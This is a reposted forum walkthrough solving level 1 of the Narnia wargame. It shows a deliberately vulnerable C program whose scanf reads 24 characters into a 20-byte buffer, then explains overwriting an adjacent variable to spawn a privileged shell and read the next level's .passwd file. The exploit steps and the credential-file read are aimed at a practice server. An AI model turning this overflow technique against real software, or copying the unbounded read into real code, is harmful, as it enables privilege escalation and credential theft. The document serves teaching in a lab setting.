TheTAZZone - Internet Chaos

Intruded.net – Narnia – Level1 Solution

ORIGINALLY POSTED BY OUTERLIMIT FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network


This is related to the wargames Harry posted…
It is for the server narnia. http://www.intruded.net/narnia.html
The objective on this box is to look at the source code to the program for the level you are on, and find a way to exploit or accomplish what it asks.

This is my solution and explanation of level1.

Once you log in:
cd /wargame

The program you are trying to use is level1; its source code is level1.c

[code]#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);   /* reads up to 24 chars into a 20-byte buffer */

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        seteuid(1002);     /* only reached if val was overwritten */
        system("/bin/sh");
    } else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}[/code]

Looking at this code, they want you to change val’s value from 0x41414141 to 0xdeadbeef.
Notice that it prompts you for input, stores it in the variable buf, and then prints out val…
The variable buf is declared as an array with 20 elements, but the scanf format %24s accepts up to 24 characters, so nothing keeps the input within the size of buf, and that allows for a buffer overflow.

You can play around with this by entering inputs of varying lengths.
You should notice that anything less than 20 characters does not affect the value of val, but if you input something more than 20 characters, the value of val changes.

This is how you are going to accomplish changing the value to 0xdeadbeef.

You can figure out how what you enter affects the value by entering 000000000000000000000 (21 0’s).
Your output becomes 0x41410030
By inputting 20 0’s followed by a single different character you can see how the value changes.
Closer inspection shows that the last two digits are the ASCII value (in hex) of the key you entered.
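The overflow described above, modelled on a constructed 24-byte frame, as an added example that is not part of the original post. It assumes val sits directly after buf and is stored little-endian (which the 0x41410030 output implies); the names val_after_read and read_bounded are hypothetical. It compares the program's %24s width with a width derived from the buffer size.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN   20             /* char buf[20] in level1.c */
#define VAL_OFF   BUF_LEN        /* assumption: val sits directly after buf */
#define MAX_CHARS 19             /* BUF_LEN - 1: leaves room for the NUL */
#define STR_(x) #x
#define STR(x)  STR_(x)

/* Read val the way a little-endian target stores it. */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Model of scanf("%<width>s", buf): up to `width` characters are stored
   from offset 0, then a NUL. Input is assumed to contain no whitespace.
   Returns val as the program would print it afterwards. */
uint32_t val_after_read(const char *input, size_t width)
{
    unsigned char frame[BUF_LEN + 4 + 1] = {0};  /* +1: NUL after 24 chars */
    size_t n = strlen(input);
    memset(frame + VAL_OFF, 0x41, 4);            /* val = 0x41414141 */
    if (n > width) n = width;
    if (n > sizeof frame - 1) n = sizeof frame - 1;
    memcpy(frame, input, n);
    frame[n] = '\0';
    return le32(frame + VAL_OFF);
}

/* Corrected read: the width comes from the buffer size, so the longest
   token plus its NUL always fits. Returns the stored length. */
size_t read_bounded(const char *line, char out[BUF_LEN])
{
    if (sscanf(line, "%" STR(MAX_CHARS) "s", out) != 1) out[0] = '\0';
    return strlen(out);
}

int main(void)
{
    const char *in21 = "0000000000" "0000000000" "0";  /* constructed input */
    char buf[BUF_LEN];
    printf("%%24s: val = 0x%08x\n", (unsigned)val_after_read(in21, 24));
    printf("%%19s: val = 0x%08x\n", (unsigned)val_after_read(in21, MAX_CHARS));
    printf("bounded read kept %zu chars\n", read_bounded(in21, buf));
    return 0;
}
```

In this model an input of exactly 20 characters already changes val, because the terminating NUL lands on its lowest byte.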

So basically what you have to do is enter 20 0’s, and then whatever characters have the ASCII values you need…
If you look at an ASCII table, these are not standard letters on your keyboard… Some of them aren’t even documented.

So what I did was write a C++ program to print out each character for me…
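[code]#include <iostream>
using namespace std;

int main(int argc, char* argv[])
{
    unsigned long target = 0xdeadbeef;
    // View target's storage one byte at a time
    char *p = (char *) &target;
    // Print the first 4 bytes in the order they sit in memory
    for (int i = 0; i < 4; i++) {
        cout << p[i];
    }
    return 0;
}[/code]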

This program will print out the characters you need to use after the 20 0’s in order to pass the level and replace val with 0xdeadbeef.

In order to get the 4 characters we need, we use a char pointer. A char is stored as 1 byte in memory. 0xdeadbeef is stored as 4 consecutive bytes, lowest byte first, as the 0x41410030 output above shows.
We need the char pointer to point to the first byte of 0xdeadbeef.
This is done by setting our pointer equal to the address of target…
[code] char *p = &target;[/code]
However, the compiler does not like that because target is a long integer, not a character.
So we must cast the address of target to a char pointer:
[code] char *p = (char *) &target;[/code]
Now p points to the beginning of target… we know that it is 4 bytes long, so we need to print 4 characters.
C++ will let you use a pointer as an array; each next element of the array increases the address it points to by the size of the type pointed to.
In the case of a char pointer, it increments by 1 byte each time.

So following the for loop we will print p[0], p[1], p[2], p[3].
Those are the 4 characters needed in the first program to set val equal to 0xdeadbeef.

In order to run the program you can do this:
Copy the code
type this: cat > /tmp/lvl1.cpp
Paste the code
Press Ctrl+D
type this: g++ -o /tmp/lvl1 /tmp/lvl1.cpp
chmod +x /tmp/lvl1
/tmp/lvl1

Now copy the 4 characters

then run /wargame/level1
type in 20 0’s, and paste those characters.

Now you should have a new shell as level2
cat /home/level2/.passwd

Continue on to level2

Good luck!

2 Responses to Intruded.net – Narnia – Level1 Solution

  1. Pingback: Bookmarks about Level1

  2. yahhh December 26, 2008 at 12:11 am

    I just had a go at this wargame. My solution is a little different:

    ( to see writ3r’s comment go to the tutorial: http://tazforum.thetazzone.com/viewtopic.php?f=28&t=10875&p=124394#p124394 )
